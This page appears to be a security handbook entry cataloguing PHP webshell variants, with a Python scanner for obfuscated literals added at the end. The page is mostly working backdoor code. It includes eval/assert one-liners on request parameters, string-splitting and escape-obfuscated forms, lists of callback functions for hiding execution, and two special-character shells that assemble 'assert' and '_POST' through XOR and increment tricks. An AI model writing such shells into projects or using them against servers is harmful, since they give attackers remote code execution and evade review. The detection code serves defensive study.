WebShell Variants

mac, 2024-10-20

4.1.7. WebShell

4.1.7.1. Common Variants

- GLOBALS

    eval($GLOBALS['_POST']['op']);

- $_FILE

    eval($_FILE['name']);

- String splitting

    assert(${"_PO"."ST"} ['sz']);

- Dynamic function execution

    $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);

- create_function

    $function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function();

- preg_replace
- rot13
- base64
- Radix (hex/octal) conversion

    "\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"

- Using the file name

    __FILE__

4.1.7.2. String Transformation Functions

- ucwords
- ucfirst
- trim
- substr_replace
- substr
- strtr
- strtoupper
- strtolower
- strtok
- str_rot13

4.1.7.3. Callback Functions

- call_user_func_array
- call_user_func
- array_filter
- array_walk
- array_map
- register_shutdown_function
- register_tick_function
- filter_var
- filter_var_array
- uasort
- uksort
- array_reduce
- array_walk_recursive

4.1.7.4. Special-Character Shell

PHP applies XOR and increment operators directly to strings, so a shell can be built entirely from special characters.

    @$_++;
    $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
    @${$__}[!$_](${$__}[$_]);

    $_=[];
    $_=@"$_"; // $_='Array';
    $_=$_['!'=='@']; // $_=$_[0];
    $___=$_; // A
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
    $___.=$__; // S
    $___.=$__; // S
    $__=$_;
    $__++;$__++;$__++;$__++; // E
    $___.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
    $___.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
    $___.=$__;

    $____='_';
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
    $____.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
    $____.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
    $____.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
    $____.=$__;

    $_=$$____;
    $___(base64_decode($_[_]));
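
For triage on the defensive side, the following added example (not part of the original notes) folds the constant expressions these variants rely on: concatenation of adjacent literals, strrev on a literal, \x and octal escapes, and XOR of two literals. It then reports watch-list names that exist only inside string literals. The SENSITIVE list, the scan function and the helper names are assumptions of this example; shells built with the increment trick or routed through the callback functions listed above are not covered.

```python
import re

# Assumed watch list: names that rarely belong inside PHP string literals.
SENSITIVE = ("eval", "assert", "base64_decode", "create_function", "_POST", "_GET")
LIT = "\x01([^\x02]*)\x02"  # internal marker wrapped around each literal's content
PHP_STR = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'', re.S)
ESCAPE = re.compile(r"\\(?:x([0-9a-fA-F]{1,2})|([0-7]{1,3}))")

def _tok(s):
    """Wrap folded content in markers, masking stray marker bytes."""
    return "\x01" + re.sub("[\x01\x02]", "?", s) + "\x02"

def _literal(m):
    """Tokenise one literal; only double-quoted ones get \\xNN / octal decoding."""
    if m.group(1) is None:
        return _tok(m.group(2))
    to_chr = lambda e: chr(int(e.group(1), 16) if e.group(1) else int(e.group(2), 8) & 0xFF)
    return _tok(ESCAPE.sub(to_chr, m.group(1)))

def _xor(m):
    """PHP XORs two strings byte by byte, up to the shorter operand."""
    return _tok("".join(chr(ord(a) ^ ord(b)) for a, b in zip(m.group(1), m.group(2))))

FOLDS = [
    (re.compile(r"strrev\s*\(\s*" + LIT + r"\s*\)", re.I), lambda m: _tok(m.group(1)[::-1])),
    (re.compile(LIT + r"\s*\^\s*" + LIT), _xor),
    (re.compile(r"(?<!\w)\(\s*(" + LIT + r")\s*\)"), lambda m: m.group(1)),  # (lit) -> lit
    (re.compile(LIT + r"\s*\.\s*" + LIT), lambda m: _tok(m.group(1) + m.group(2))),
]

def scan(php_source):
    """Return watch-list names found inside string literals after constant folding."""
    text = PHP_STR.sub(_literal, php_source)
    changed = True
    while changed:  # folds can enable each other, so run to a fixed point
        changed = False
        for pattern, fold in FOLDS:
            text, count = pattern.subn(fold, text)
            changed = changed or count > 0
    literals = " ".join(re.findall(LIT, text)).lower()
    return sorted(n for n in SENSITIVE if n.lower() in literals)

# Inputs copied from the variants listed on this page.
SAMPLES = {
    "split": r'''assert(${"_PO"."ST"} ['sz']);''',
    "escapes": r'''"\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"''',
    "xor": r'''$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");''',
}
print({label: scan(src) for label, src in SAMPLES.items()})
```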